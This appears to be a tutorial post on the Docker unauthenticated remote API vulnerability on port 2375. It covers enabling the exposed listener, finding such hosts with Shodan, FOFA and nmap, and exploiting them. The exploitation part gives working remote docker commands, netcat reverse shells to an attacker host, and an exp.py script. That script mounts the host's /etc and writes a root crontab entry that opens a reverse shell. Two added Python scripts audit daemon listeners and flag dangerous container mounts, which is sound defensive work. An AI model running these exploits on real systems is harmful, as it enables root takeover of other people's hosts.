Network Security Series [15]: Docker Unauthorized Access Vulnerability

Introduction to Docker

  • Docker uses LXC to provide VM-like functionality while consuming far fewer hardware resources, so that more computing capacity can be offered to users. Unlike a VM, LXC is not a hardware virtualization method: it fits none of full virtualization, partial virtualization or paravirtualization, but is an operating-system-level virtualization method, which is less intuitive to grasp than a VM. So we start from the problems that virtualization and Docker set out to solve and look at how Docker meets users' virtualization needs.

Enabling Docker remote access

Check the service status and open its systemd unit file:

```bash
systemctl status docker.service
vim /usr/lib/systemd/system/docker.service
```

Add the following listeners to the ExecStart line (a TCP listener on all interfaces plus the local Unix socket):

```bash
-H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
```

Reload the unit files and restart Docker:

```bash
systemctl daemon-reload
systemctl restart docker.service
```

  • Firewall settings

```bash
ufw status
ufw allow 2375
ufw reload
```
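The ExecStart change and the firewall rule above are precisely the configuration that creates the vulnerability: every client that can reach port 2375 talks to dockerd with no authentication, and dockerd runs as root. The script below is an added example, not part of the original post. It audits a docker.service ExecStart line and an /etc/docker/daemon.json for tcp:// listeners that are not protected by --tlsverify, and distinguishes all-interface binds from loopback binds. The unit lines and daemon.json it reads are constructed samples; the certificate paths in SAMPLE_EXECSTART_TLS are placeholders.

```python
"""Audit a Docker daemon's listener configuration for unauthenticated TCP exposure.

Added example (not from the original post). Checks the two places the post's
change can land: the ExecStart= line of docker.service and the "hosts" key of
/etc/docker/daemon.json. All inputs below are constructed samples.
"""
import json
import shlex
from dataclasses import dataclass

# Constructed sample: the ExecStart line as edited in the post (TCP listener, no TLS).
SAMPLE_EXECSTART = (
    "ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 "
    "-H unix:///var/run/docker.sock --containerd=/run/containerd/containerd.sock"
)
# Constructed sample: the same daemon with mutual TLS required on the TCP listener
# (certificate paths are placeholders).
SAMPLE_EXECSTART_TLS = (
    "ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2376 -H unix:///var/run/docker.sock "
    "--tlsverify --tlscacert=/etc/docker/ca.pem "
    "--tlscert=/etc/docker/server-cert.pem --tlskey=/etc/docker/server-key.pem"
)
# Constructed sample /etc/docker/daemon.json with the same exposure.
SAMPLE_DAEMON_JSON = '{"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}'

# Bind addresses that mean "every interface" (empty = dockerd default 0.0.0.0:2375).
ALL_INTERFACES = {"", "0.0.0.0", "::", "[::]"}


@dataclass
class Finding:
    severity: str   # "critical", "high" or "info"
    listener: str
    reason: str


def parse_execstart(line: str) -> list[str]:
    """Return the dockerd argument vector from a systemd ExecStart= line."""
    _, _, cmd = line.partition("=")
    return shlex.split(cmd.strip())


def assess_listeners(hosts: list[str], tls_verify: bool) -> list[Finding]:
    """Rate each tcp:// listener; unix:// and fd:// are gated by file permissions."""
    findings: list[Finding] = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue
        bind = h[len("tcp://"):]
        addr = bind.rsplit(":", 1)[0] if ":" in bind else bind
        if not tls_verify:
            sev = "critical" if addr in ALL_INTERFACES else "high"
            findings.append(Finding(sev, h,
                "plaintext API without --tlsverify: any client that reaches the port "
                "controls the daemon, which runs as root"))
        elif addr in ALL_INTERFACES:
            findings.append(Finding("info", h,
                "TLS client auth required, but bound on all interfaces; "
                "restrict reachability with a firewall"))
    return findings


def audit_dockerd_args(args: list[str]) -> list[Finding]:
    """Extract -H/--host listeners and --tlsverify from a dockerd argument vector."""
    hosts: list[str] = []
    tls_verify = False
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 2
            continue
        if a.startswith(("-H=", "--host=")):
            hosts.append(a.split("=", 1)[1])
        elif a in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
        i += 1
    return assess_listeners(hosts, tls_verify)


def audit_daemon_json(text: str) -> list[Finding]:
    """Same check for the daemon.json form of the configuration."""
    cfg = json.loads(text)
    return assess_listeners(list(cfg.get("hosts", [])), bool(cfg.get("tlsverify", False)))


if __name__ == "__main__":
    checks = (
        ("docker.service", audit_dockerd_args(parse_execstart(SAMPLE_EXECSTART))),
        ("docker.service (TLS)", audit_dockerd_args(parse_execstart(SAMPLE_EXECSTART_TLS))),
        ("daemon.json", audit_daemon_json(SAMPLE_DAEMON_JSON)),
    )
    for label, findings in checks:
        for f in findings:
            print(f"[{f.severity}] {label}: {f.listener}: {f.reason}")
```

A critical finding means the daemon is remotely controllable by anyone who can reach the port. The remediation is to remove the tcp:// listener entirely, or to keep it on 2376 with --tlsverify and a client CA, and in either case to replace the blanket `ufw allow 2375` with a rule that admits only the management hosts.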

Vulnerability discovery

  • Specific port: 2375
  • Search engines: shodan, fofa

```bash
nmap -A -p- -T4 -Pn xx.xx.xx.xx
```

Example output when scanning a local daemon listening on 2375:
```
[root@yang ~]# nmap -A -p 2375 -T4 -Pn localhost
Starting Nmap 7.70 ( https://nmap.org ) at 2025-07-10 18:20 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00019s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE VERSION
2375/tcp open  docker  Docker 25.0.1
| docker-version:
|   Components:
|
|       Version: 25.0.1
|       Name: Engine
|       Details:
|         ApiVersion: 1.44
|         BuildTime: 2024-01-23T23:09:31.000000000+00:00
|         MinAPIVersion: 1.24
|         Experimental: false
|         Os: linux
|         Arch: amd64
|         KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|         GitCommit: 71fa3ab
|         GoVersion: go1.21.6
|
|       Version: 1.6.27
|       Name: containerd
|       Details:
|         GitCommit: a1496014c916f9e62104b33d1bb5bd03b0858e59
|
|       Version: 1.1.11
|       Name: runc
|       Details:
|         GitCommit: v1.1.11-0-g4bccb38
|
|       Version: 0.19.0
|       Name: docker-init
|       Details:
|         GitCommit: de40ad0
|   BuildTime: 2024-01-23T23:09:31.000000000+00:00
|   ApiVersion: 1.44
|   GoVersion: go1.21.6
|   Arch: amd64
|   MinAPIVersion: 1.24
|   Os: linux
|   Version: 25.0.1
|   KernelVersion: 4.18.0-348.7.1.el8_5.x86_64
|   GitCommit: 71fa3ab
|   Platform:
|_    Name: Docker Engine - Community
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:33 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 404 Not Found
|     Content-Type: application/json
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 29
|     {"message":"page not found"}
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Api-Version: 1.44
|     Docker-Experimental: false
|     Ostype: linux
|     Server: Docker/25.0.1 (linux)
|     Date: Thu, 10 Jul 2025 10:20:08 GMT
|     Content-Length: 0
|   docker:
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.7 - 3.10
Network Distance: 0 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.60 seconds
```

Exploitation

  • Query container state directly through the API: version and info return detailed daemon information, and ps lists the containers and their processes directly.

```bash
docker -H tcp://18.16.202.95:2375 version
docker -H tcp://18.16.202.95:2375 images
docker -H tcp://18.16.202.95:2375 info
docker -H tcp://18.16.202.95:2375 ps
```

  • Use the run command to create and start a container.

```bash
docker -H tcp://xx.xx.xx.xx:2375 run -it redis /bin/bash
```

Reverse shell

  • Start a listener on the attacking machine

```bash
nc -lvvp 8030
```

  • Run on the target machine

```bash
nc 192.168.1.21 8030 -e /bin/sh
nc 192.168.1.21 8030 -e sh
```

Reverse shell via a crontab write

```bash
cd /root
cat exp.py
```

```python
import docker

# Connect to the exposed daemon (replace your-ip with the target address)
client = docker.DockerClient(base_url='http://your-ip:2375')
# Bind the host's /etc into the container read-write and append an entry to root's crontab
data = client.containers.run(
    'alpine:latest',
    r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''',
    remove=True,
    volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}},
)
```
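The exp.py above works only because the API let an unauthenticated caller create a container with the host's /etc bind-mounted read-write; the crontab entry is then an ordinary file write from inside the container. The script below is an added example, not from the original post. It reads the HostConfig block that `docker inspect` prints and flags bind mounts of sensitive host paths, privileged mode, host PID or network namespaces and dangerous added capabilities, which is what a responder reviewing an exposed daemon, or an admission check placed in front of it, looks for. The inspect output is constructed inline; the first container mirrors the post's /etc mount.

```python
"""Flag container settings that give a container write access to, or control of, the host.

Added example (not from the original post). Input is the JSON array that
`docker inspect <id> ...` prints; the sample below is constructed.
"""
import json
from pathlib import PurePosixPath

# Host paths where a writable bind mount hands the container persistence or
# credentials on the host (the post's technique writes root's crontab via /etc).
SENSITIVE_HOST_PATHS = [
    "/etc", "/root", "/home", "/boot", "/proc", "/sys",
    "/usr", "/bin", "/sbin", "/lib", "/lib64",
    "/var/run/docker.sock", "/run/docker.sock",
    "/var/spool/cron", "/var/lib/docker",
]
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "NET_ADMIN"}

# Constructed `docker inspect` output: one container built the way exp.py does it,
# one ordinary web container with a named volume and a read-only static mount.
SAMPLE_INSPECT = json.dumps([
    {"Id": "constructed-1", "Name": "/suspicious",
     "HostConfig": {"Binds": ["/etc:/tmp/etc:rw"], "Privileged": False,
                    "PidMode": "", "NetworkMode": "default", "CapAdd": None}},
    {"Id": "constructed-2", "Name": "/web",
     "HostConfig": {"Binds": ["webdata:/data", "/srv/web/static:/usr/share/nginx/html:ro"],
                    "Privileged": False, "PidMode": "", "NetworkMode": "bridge", "CapAdd": []}},
])


def _is_under(path: str, parent: str) -> bool:
    """True if path equals parent or lies beneath it (pure path comparison, no I/O)."""
    p, q = PurePosixPath(path), PurePosixPath(parent)
    return p == q or q in p.parents


def audit_host_config(host_config: dict) -> list[str]:
    """Return human-readable findings for one container's HostConfig block."""
    findings: list[str] = []
    for bind in host_config.get("Binds") or []:
        parts = bind.split(":")
        src = parts[0]
        dst = parts[1] if len(parts) > 1 else "?"
        opts = parts[2].split(",") if len(parts) > 2 else ["rw"]
        if not src.startswith("/"):
            continue  # named volume, not a host path
        mode = "read-only" if "ro" in opts else "writable"
        if src == "/":
            hit = "/"  # the whole host filesystem; matched exactly so /srv etc. are not caught
        else:
            hit = next((s for s in SENSITIVE_HOST_PATHS if _is_under(src, s)), None)
        if hit:
            findings.append(f"{mode} bind mount of host {src} at {dst} (sensitive path {hit})")
    if host_config.get("Privileged"):
        findings.append("Privileged=true: all capabilities and host devices available")
    if host_config.get("PidMode") == "host":
        findings.append("PidMode=host: host processes visible and signalable")
    if host_config.get("NetworkMode") == "host":
        findings.append("NetworkMode=host: container shares the host network namespace")
    caps = set(host_config.get("CapAdd") or []) & DANGEROUS_CAPS
    if caps:
        findings.append("CapAdd grants " + ", ".join(sorted(caps)))
    return findings


def audit_inspect_output(text: str) -> dict[str, list[str]]:
    """Run audit_host_config over every container in `docker inspect` JSON output."""
    return {c.get("Name", c.get("Id", "?")): audit_host_config(c.get("HostConfig") or {})
            for c in json.loads(text)}


if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name, "->", findings or ["no host-compromising settings"])
```

Against a live daemon, feed it the output of `docker inspect $(docker ps -aq)`; a hit on /etc, /var/spool/cron or the Docker socket on a host whose API was reachable should be treated as a host compromise, so the host's crontabs and authorized_keys files need to be reviewed alongside the container list.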